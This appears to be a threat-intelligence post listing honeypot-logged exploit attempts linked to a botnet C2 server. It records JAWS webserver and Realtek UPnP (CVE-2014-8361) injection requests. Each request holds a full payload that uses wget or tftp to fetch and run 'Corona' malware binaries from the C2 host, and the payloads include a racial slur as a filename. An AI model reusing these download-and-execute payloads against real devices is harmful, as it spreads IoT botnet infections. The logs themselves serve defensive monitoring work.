internetweather

Botnet C2 91.209.70.174 – Exploit attempts detected

Aug 11th, 2019
Source IP: 167.71.130.93
Country: United States
User Agent: python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.12.2.el7.x86_64
Method: GET
URI: /shell?cd%20/tmp;%20echo%20%3ENiGGeR%20%7C%7C%20cd%20/var;%20echo%20%3ENiGGeR;%20cp%20/bin/busybox%20yeet;%20%3Eyeet;%20chmod%20777%20yeet;%20nohup%20wget%20http:/%5C/91.209.70.174:80/Corona.arm4%20-O%20yeet%20%7C%7C%20nohup%20tftp%20-r%20Corona.arm4%20-g%2091.209.70.174%20-l%20yeet;%20chmod%20777%20yeet;./yeet%20jaws;%20rm%20-rf%20yeeter%20%3E/dev/null%202%3E&1
POST_Data: "-"
Target Port: 60001
Tag: JAWS Webserver RCE | IoT
FirstSeen: 2019-08-09T15:06:38Z
LastSeen: 2019-08-10T18:38:01Z
Event Count: 290

Source IP: 167.71.130.93
Country: United States
User Agent: python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.12.2.el7.x86_64
Method: GET
URI: /shell?cd%20/tmp;%20echo%20%3ENiGGeR%20%7C%7C%20cd%20/var;%20echo%20%3ENiGGeR;%20cp%20/bin/busybox%20yeet;%20%3Eyeet;%20chmod%20777%20yeet;%20nohup%20wget%20http:/%5C/91.209.70.174:80/Corona.arm7%20-O%20yeet%20%7C%7C%20nohup%20tftp%20-r%20Corona.arm7%20-g%2091.209.70.174%20-l%20yeet;%20chmod%20777%20yeet;./yeet%20jaws;%20rm%20-rf%20yeeter%20%3E/dev/null%202%3E&1
POST_Data: "-"
Target Port: 60001
Tag: JAWS Webserver RCE | IoT
FirstSeen: 2019-08-09T15:06:38Z
LastSeen: 2019-08-10T18:38:00Z
Event Count: 296

Source IP: 165.22.244.168
Country: United States
User Agent: python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-957.12.2.el7.x86_64
Method: POST
URI: /picsdesc.xml
POST_Data: "<?xml version=\x221.0\x22 ?><s:Envelope xmlns:s=\x22http://schemas.xmlsoap.org/soap/envelope/\x22 s:encodingStyle=\x22http://schemas.xmlsoap.org/soap/encoding/\x22><s:Body><u:AddPortMapping xmlns:u=\x22urn:schemas-upnp-org:service:WANIPConnection:1\x22><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/;wget http://91.209.70.174/Corona.mips`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>"
Target Port: 52869
Tag: Realtek RCE | Router | CVE-2014-8361
FirstSeen: 2019-07-14T07:04:32Z
LastSeen: 2019-07-14T07:05:28Z
Event Count: 2